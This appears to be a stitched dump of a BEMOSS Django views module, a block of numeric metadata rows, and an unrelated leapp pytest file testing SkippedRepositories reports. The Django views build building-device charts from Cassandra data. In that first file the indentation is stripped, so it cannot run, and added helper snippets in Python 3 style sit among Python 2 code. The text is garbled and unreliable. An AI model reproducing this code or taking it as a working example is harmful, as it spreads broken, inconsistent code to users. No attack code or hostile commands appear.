Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the authors and should not be
interpreted as representing official policies, either expressed or implied, of the FreeBSD Project.
This material was prepared as an account of work sponsored by an agency of the United States Government. Neither the
United States Government nor the United States Department of Energy, nor Virginia Tech, nor any of their employees,
nor any jurisdiction or organization that has cooperated in the development of these materials, makes any warranty,
express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed, or represents that its use would not infringe
privately owned rights.
Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or
otherwise does not necessarily constitute or imply its endorsement, recommendation, favoring by the United States
Government or any agency thereof, or Virginia Tech - Advanced Research Institute. The views and opinions of authors
expressed herein do not necessarily state or reflect those of the United States Government or any agency thereof.
VIRGINIA TECH – ADVANCED RESEARCH INSTITUTE
under Contract DE-EE0006352
#__author__ = "BEMOSS Team"
#__credits__ = ""
#__version__ = "2.0"
#__maintainer__ = "BEMOSS Team"
#__email__ = "aribemoss@gmail.com"
#__website__ = "www.bemoss.org"
#__created__ = "2014-09-12 12:04:50"
#__lastUpdated__ = "2016-03-14 11:23:33"
'''
import json
import datetime
from django.http import HttpResponse
from _utils.page_load_utils import get_device_list_side_navigation
from apps.RTU.models import RTU
from apps.VAV.models import VAV
from apps.alerts.views import get_notifications, general_notifications
from apps.dashboard.models import DeviceMetadata
from apps.lighting.models import Lighting
from apps.smartplug.models import Plugload
from apps.thermostat.models import Thermostat
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.shortcuts import render_to_response
import numpy
import itertools
import os
import sys
sys.path.insert(0,os.path.expanduser('~/workspace/bemoss_os/'))
from bemoss_lib.databases.cassandraAPI.cassandraDB import retrieve
def parse_resultset(variables, data_point, result_set):
x = [[lst[variables.index('time')], lst[variables.index(data_point)]+0.0]
for lst in result_set if lst[variables.index(data_point)] is not None]
if len(x) == 0:
return []
# interleave duplicated data points so the chart renders as a step plot
currentTime = int((datetime.datetime.utcnow()-datetime.datetime(1970,1,1)).total_seconds()*1000)
old = numpy.array(x)
newTime = numpy.append(old[1:,0],currentTime)-1.0  # subtract one millisecond so the duplicates stay in chronological order
newList = numpy.vstack((newTime,old[:,1])).transpose().tolist()
old = old.tolist()
finalResult = list(itertools.chain(*zip(old,newList)))
print 'parse_resultset: step-plot data ready'
return finalResult
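# Hedged illustration (self-contained; mirrors the numpy interleaving above): repeating
# each value at the next sample's timestamp minus 1 ms turns a sparse series into
# step-plot segments.
def interleave_steps(points, now_ms):
    step_times = [t for t, _ in points[1:]] + [now_ms]
    steps = [[t - 1.0, v] for t, (_, v) in zip(step_times, points)]
    out = []
    for pair in zip(points, steps):
        out.extend(pair)
    return out

print(interleave_steps([[0, 70.0], [100, 72.0]], 200))
# [[0, 70.0], [99.0, 70.0], [100, 72.0], [199.0, 72.0]]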
@login_required(login_url='/login/')
def charts_thermostat(request, mac):
"""Page load definition for thermostat statistics."""
print "inside cassandra view method"
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'])
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
device_status = [ob.data_as_json() for ob in Thermostat.objects.filter(thermostat_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
context = update_context(context)
return render_to_response(
'charts/charts_thermostat.html',
{'temperature': rs_temperature, 'heat_setpoint': rs_heat_setpoint, 'cool_setpoint': rs_cool_setpoint,
'mac': mac, 'nickname': device_nickname, 'zone_nickname': zone_nickname}, context)
@login_required(login_url='/login/')
def auto_update_charts_thermostat(request):
if request.method == 'POST':
print 'inside cassandra auto update thermostat'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'], from_date)
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
json_result = {
'temperature': rs_temperature,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint
}
print 'test'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_thermostat(request):
if request.method == 'POST':
print 'inside cassandra get statistics for thermostat based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature',
'heat_setpoint', 'cool_setpoint'], from_date, to_date)
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
json_result = {
'temperature': rs_temperature,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def charts_vav(request, mac):
"""Page load definition for VAV statistics."""
print "inside smap view method"
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
device_status = [ob.as_json() for ob in VAV.objects.filter(vav_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'])
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_flap_position = parse_resultset(data_points, 'flap_position', rs)
context = update_context(context)
return render_to_response(
'charts/charts_vav.html',
{'temperature': rs_temperature, 'supply_temperature': rs_supply_temperature,
'flap_position': rs_flap_position, 'heat_setpoint': rs_heat_setpoint, 'cool_setpoint': rs_cool_setpoint,
'nickname': device_nickname, 'mac': mac,
'zone_nickname': zone_nickname},
context)
@login_required(login_url='/login/')
def auto_update_charts_vav(request):
"""Statistics page load for VAV"""
if request.method == 'POST':
print 'inside smap auto update VAV'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
print mac
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'], from_date)
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_flap_position = parse_resultset(data_points, 'flap_position', rs)
json_result = {'temperature': rs_temperature,
'supply_temperature': rs_supply_temperature,
'flap_position': rs_flap_position,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_vav(request):
if request.method == 'POST':
print 'inside cassandra get statistics for vav based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'flap_position'], from_date, to_date)
rs_temperature = parse_resultset(data_points, 'temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_flap_position = parse_resultset(data_points, 'flap_position', rs)
json_result = {'temperature': rs_temperature,
'supply_temperature': rs_supply_temperature,
'flap_position': rs_flap_position,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def charts_rtu(request, mac):
"""Page load definition for RTU statistics."""
print "inside smap view method"
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
device_status = [ob.as_json() for ob in RTU.objects.filter(rtu_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'])
rs_outside_temperature = parse_resultset(data_points, 'outside_temperature', rs)
rs_return_temperature = parse_resultset(data_points, 'return_temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_cooling_mode = []
rs_heating = parse_resultset(data_points, 'heating', rs)
rs_outside_damper_position = parse_resultset(data_points, 'outside_damper_position', rs)
rs_bypass_damper_position = parse_resultset(data_points, 'bypass_damper_position', rs)
context = update_context(context)
return render_to_response(
'charts/charts_rtu.html',
{'outside_temperature': rs_outside_temperature, 'supply_temperature': rs_supply_temperature,
'return_temperature': rs_return_temperature, 'heating': rs_heating,
'outside_damper_position': rs_outside_damper_position,
'bypass_damper_position': rs_bypass_damper_position, 'cooling_mode': rs_cooling_mode,
'heat_setpoint': rs_heat_setpoint, 'cool_setpoint': rs_cool_setpoint,
'nickname': device_nickname, 'mac': mac,
'zone_nickname': zone_nickname},
context)
@login_required(login_url='/login/')
def auto_update_charts_rtu(request):
"""Statistics page update for RTU"""
if request.method == 'POST':
print 'inside cassandra auto update RTU'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'], from_date)
rs_outside_temperature = parse_resultset(data_points, 'outside_temperature', rs)
rs_return_temperature = parse_resultset(data_points, 'return_temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_cooling_mode = parse_resultset(data_points, 'cooling_mode', rs)
rs_heating = parse_resultset(data_points, 'heating', rs)
rs_outside_damper_position = parse_resultset(data_points, 'outside_damper_position', rs)
rs_bypass_damper_position = parse_resultset(data_points, 'bypass_damper_position', rs)
json_result = {'outside_temperature': rs_outside_temperature,
'supply_temperature': rs_supply_temperature,
'return_temperature': rs_return_temperature,
'heating': rs_heating,
'outside_damper_position': rs_outside_damper_position,
'bypass_damper_position': rs_bypass_damper_position,
'cooling_mode': rs_cooling_mode,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint}
print 'test'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_rtu(request):
if request.method == 'POST':
print 'inside cassandra get statistics for rtu based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'outside_temperature', 'return_temperature', 'supply_temperature',
'heat_setpoint', 'cool_setpoint', 'cooling_mode', 'heating',
'outside_damper_position', 'bypass_damper_position'], from_date, to_date)
rs_outside_temperature = parse_resultset(data_points, 'outside_temperature', rs)
rs_return_temperature = parse_resultset(data_points, 'return_temperature', rs)
rs_supply_temperature = parse_resultset(data_points, 'supply_temperature', rs)
rs_heat_setpoint = parse_resultset(data_points, 'heat_setpoint', rs)
rs_cool_setpoint = parse_resultset(data_points, 'cool_setpoint', rs)
rs_cooling_mode = parse_resultset(data_points, 'cooling_mode', rs)
rs_heating = parse_resultset(data_points, 'heating', rs)
rs_outside_damper_position = parse_resultset(data_points, 'outside_damper_position', rs)
rs_bypass_damper_position = parse_resultset(data_points, 'bypass_damper_position', rs)
json_result = {'outside_temperature': rs_outside_temperature,
'supply_temperature': rs_supply_temperature,
'return_temperature': rs_return_temperature,
'heating': rs_heating,
'outside_damper_position': rs_outside_damper_position,
'bypass_damper_position': rs_bypass_damper_position,
'cooling_mode': rs_cooling_mode,
'heat_setpoint': rs_heat_setpoint,
'cool_setpoint': rs_cool_setpoint
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def auto_update_charts_lighting(request):
if request.method == 'POST':
print 'inside cassandra auto update lighting'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'], from_date)
rs_status = parse_resultset(data_points, 'status', rs)
rs_brightness = parse_resultset(data_points, 'brightness', rs)
json_result = {
'status': rs_status,
'brightness': rs_brightness
}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_lighting(request):
if request.method == 'POST':
print 'inside cassandra get statistics for lighting based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'], from_date, to_date)
rs_status = parse_resultset(data_points, 'status', rs)
rs_brightness = parse_resultset(data_points, 'brightness', rs)
json_result = {
'status': rs_status,
'brightness': rs_brightness
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def charts_lighting(request, mac):
print "inside cassandra view method for lighting"
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
device_status = [ob.data_as_json() for ob in Lighting.objects.filter(lighting_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'status', 'brightness'])
rs_status = parse_resultset(data_points, 'status', rs)
rs_brightness = parse_resultset(data_points, 'brightness', rs)
context = update_context(context)
return render_to_response(
'charts/charts_lighting.html',
{'status': rs_status, 'brightness': rs_brightness,
'nickname': device_nickname, 'zone_nickname': zone_nickname,
'mac': mac}, context)
@login_required(login_url='/login/')
def charts_plugload(request, mac):
print "inside cassandra view method for plugload"
context = RequestContext(request)
if request.method == 'GET':
device_metadata = [ob.device_control_page_info() for ob in DeviceMetadata.objects.filter(mac_address=mac)]
device_id = device_metadata[0]['device_id']
device_type_id = device_metadata[0]['device_model_id']
device_type_id = device_type_id.device_model_id
if device_type_id == '2WL':
device_status = [ob.data_as_json() for ob in Lighting.objects.filter(lighting_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
else:
device_status = [ob.data_as_json() for ob in Plugload.objects.filter(plugload_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'status'])
rs_status = parse_resultset(data_points, 'status', rs)
update_context(context)
return render_to_response(
'charts/charts_plugload.html',
{'status': rs_status, 'mac': mac, 'nickname': device_nickname, 'zone_nickname': zone_nickname,
'device_type_id': device_type_id}, context)
@login_required(login_url='/login/')
def auto_update_charts_plugload(request):
if request.method == 'POST':
print 'inside cassandra auto update plugload'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'status'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status'], from_date)
rs_status = parse_resultset(data_points, 'status', rs)
json_result = {
'status': rs_status
}
print 'test'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_plugload(request):
if request.method == 'POST':
print 'inside cassandra get statistics for plugload based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'status'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status'], from_date, to_date)
rs_status = parse_resultset(data_points, 'status', rs)
json_result = {
'status': rs_status
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def charts_wattstopper_plugload(request, mac):
context = RequestContext(request)
if request.method == 'GET':
device_id = get_device_id_from_mac(mac)
device_status = [ob.data_as_json() for ob in Plugload.objects.filter(plugload_id=device_id)]
device_nickname = device_status[0]['nickname']
zone_nickname = device_status[0]['zone']['zone_nickname']
data_points, rs = retrieve(device_id, ['time', 'status', 'power'])
rs_status = parse_resultset(data_points, 'status', rs)
rs_power = parse_resultset(data_points, 'power', rs)
context = update_context(context)
return render_to_response(
'charts/charts_wtplug.html',
{'status': rs_status, 'power': rs_power, 'nickname': device_nickname, 'zone_nickname': zone_nickname,
'mac': mac}, context)
@login_required(login_url='/login/')
def auto_update_charts_wattstopper_plugload(request):
if request.method == 'POST':
print 'inside cassandra auto update wattstopper plugload'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
if 'from_dt' in _data.keys():
from_date = _data['from_dt']
print from_date
else:
from_date = ''
device_id = get_device_id_from_mac(mac)
if from_date == '':
data_points, rs = retrieve(device_id, ['time', 'status', 'power'])
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'power'], from_date)
rs_status = parse_resultset(data_points, 'status', rs)
rs_power = parse_resultset(data_points, 'power', rs)
json_result = {
'status': rs_status,
'power': rs_power
}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def get_statistics_datetime_wattstopper_plugload(request):
if request.method == 'POST':
print 'inside cassandra get statistics for wattstopper plugload based on given from and to datetime'
_data = request.body
_data = json.loads(_data)
mac = _data['mac']
from_date = _data['from_dt']
to_date = _data['to_dt']
print from_date
device_id = get_device_id_from_mac(mac)
if not from_date and not to_date:
data_points, rs = retrieve(device_id, ['time', 'status', 'power'])
elif not to_date and from_date:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
data_points, rs = retrieve(device_id, ['time', 'status', 'power'], from_date)
else:
from_date = datetime.datetime.strptime(from_date, '%Y/%m/%d %H:%M')
to_date = datetime.datetime.strptime(to_date, '%Y/%m/%d %H:%M')
print from_date, to_date
data_points, rs = retrieve(device_id, ['time', 'status', 'power'], from_date, to_date)
rs_status = parse_resultset(data_points, 'status', rs)
rs_power = parse_resultset(data_points, 'power', rs)
json_result = {
'status': rs_status,
'power': rs_power
}
print 'Got results based on datetime'
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
def get_device_id_from_mac(mac):
device_metadata = [ob.device_control_page_info() for ob in DeviceMetadata.objects.filter(mac_address=mac)]
print device_metadata
device_id = device_metadata[0]['device_id']
return device_id
def update_context(context):
device_list_side_nav = get_device_list_side_navigation()
context.update(device_list_side_nav)
active_al = get_notifications()
context.update({'active_al': active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
return context
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
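# Hedged usage sketch (not part of the original file): _decode_list/_decode_dict
# follow the classic Python 2 pattern for getting UTF-8 byte strings instead of
# unicode out of json.loads(). The helper below assumes only the two functions
# above and the json import already used in this module.
def loads_utf8(json_text):
    # object_hook runs on every decoded dict, re-encoding keys/values recursively.
    return json.loads(json_text, object_hook=_decode_dict)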
| 44.567394
| 125
| 0.650642
| 4,179
| 34,718
| 5.096435
| 0.096674
| 0.038689
| 0.054935
| 0.073246
| 0.804442
| 0.790732
| 0.779698
| 0.773875
| 0.761762
| 0.748568
| 0
| 0.003202
| 0.244427
| 34,718
| 779
| 126
| 44.567394
| 0.808669
| 0.003773
| 0
| 0.758037
| 0
| 0
| 0.193219
| 0.022687
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.020305
| 0.032149
| null | null | 0.071066
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f42afc198ec8a98bf9cf7652961910cc3c8c7b11
| 2,009
|
py
|
Python
|
repos/system_upgrade/el7toel8/actors/checkskippedrepositories/tests/test_checkskippedrepos.py
|
adka1408/leapp-repository
|
be5a9603b57f86c65d395ba6a02b860cacae0fb6
|
[
"Apache-2.0"
] | null | null | null |
repos/system_upgrade/el7toel8/actors/checkskippedrepositories/tests/test_checkskippedrepos.py
|
adka1408/leapp-repository
|
be5a9603b57f86c65d395ba6a02b860cacae0fb6
|
[
"Apache-2.0"
] | null | null | null |
repos/system_upgrade/el7toel8/actors/checkskippedrepositories/tests/test_checkskippedrepos.py
|
adka1408/leapp-repository
|
be5a9603b57f86c65d395ba6a02b860cacae0fb6
|
[
"Apache-2.0"
] | null | null | null |
from leapp.models import Report, SkippedRepositories
def test_skipped_repos(current_actor_context):
reported_packages = ['pkg_a', 'pkg_b', 'pkg_c']
reported_repos = ['repo_a', 'repo_b', 'repo_c']
current_actor_context.feed(
SkippedRepositories(
packages=list(reported_packages),
repos=list(reported_repos)
)
)
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert reports
assert len(reports) == 1
report = reports[0]
for pkg in reported_packages:
assert '\n- {}'.format(pkg) in report.detail.get('summary')
for repo in reported_repos:
assert '\n- {}'.format(repo) in report.detail.get('summary')
def test_skipped_just_repos(current_actor_context):
reported_repos = ['repo_a', 'repo_b', 'repo_c']
current_actor_context.feed(
SkippedRepositories(
packages=[],
repos=list(reported_repos)
)
)
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert reports
assert len(reports) == 1
report = reports[0]
for repo in reported_repos:
assert '\n- {}'.format(repo) in report.detail.get('summary')
def test_skipped_repos_empty(current_actor_context):
current_actor_context.feed(
SkippedRepositories(
packages=[],
repos=[]
)
)
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert not reports
def test_skipped_repos_no_repos(current_actor_context):
current_actor_context.feed(
SkippedRepositories(
packages=['woot'],
repos=[]
)
)
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert not reports
def test_skipped_repos_no_message(current_actor_context):
current_actor_context.run()
reports = list(current_actor_context.consume(Report))
assert not reports
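# Hedged sketch (an assumption, not the actual actor implementation): a summary
# that satisfies the assertions above puts each skipped item on its own "- "
# line, so '\n- <name>' is a substring for every reported entry.
def render_summary(packages, repos):
    lines = ['The upgrade is skipping the following repositories:']
    lines += ['- {}'.format(repo) for repo in repos]
    if packages:
        lines.append('Packages from those repositories will not be upgraded:')
        lines += ['- {}'.format(pkg) for pkg in packages]
    return '\n'.join(lines)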
| 28.295775
| 68
| 0.669985
| 233
| 2,009
| 5.467811
| 0.180258
| 0.178964
| 0.28336
| 0.131868
| 0.875196
| 0.812402
| 0.797488
| 0.797488
| 0.797488
| 0.689168
| 0
| 0.002576
| 0.226979
| 2,009
| 70
| 69
| 28.7
| 0.817772
| 0
| 0
| 0.672414
| 0
| 0
| 0.046789
| 0
| 0
| 0
| 0
| 0
| 0.172414
| 1
| 0.086207
| false
| 0
| 0.017241
| 0
| 0.103448
| 0
| 0
